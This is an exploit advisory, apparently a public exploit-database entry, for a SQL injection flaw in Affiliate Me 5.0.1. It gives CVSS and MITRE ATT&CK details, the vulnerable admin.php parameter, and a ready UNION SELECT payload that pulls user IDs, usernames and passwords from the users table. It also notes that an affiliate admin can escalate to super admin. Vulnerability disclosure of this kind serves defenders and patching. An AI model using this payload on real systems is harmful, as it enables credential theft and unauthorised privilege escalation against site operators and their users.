Headline
Affiliate Me 5.0.1 SQL Injection
Affiliate Me version 5.0.1 suffers from a remote SQL injection vulnerability.
[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection[#] Exploit Date: May 16, 2023.[#] CVSS 3.1: 6.4 (Medium)[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N[#] Tactic: Initial Access (TA0001)[#] Technique: Exploit Public-Facing Application (T1190)[#] Application Name: Affiliate Me[#] Application Version: 5.0.1[#] Vendor: https://www.powerstonegh.com/[#] Author: h4ck3r - Faisal Albuloushi[#] Contact: [email protected][#] Blog: https://www.0wl.tech[#] 3xploit:[path]/admin.php?show=reply&id=[Injected Query][#] 3xample:[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -[#] Notes:- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.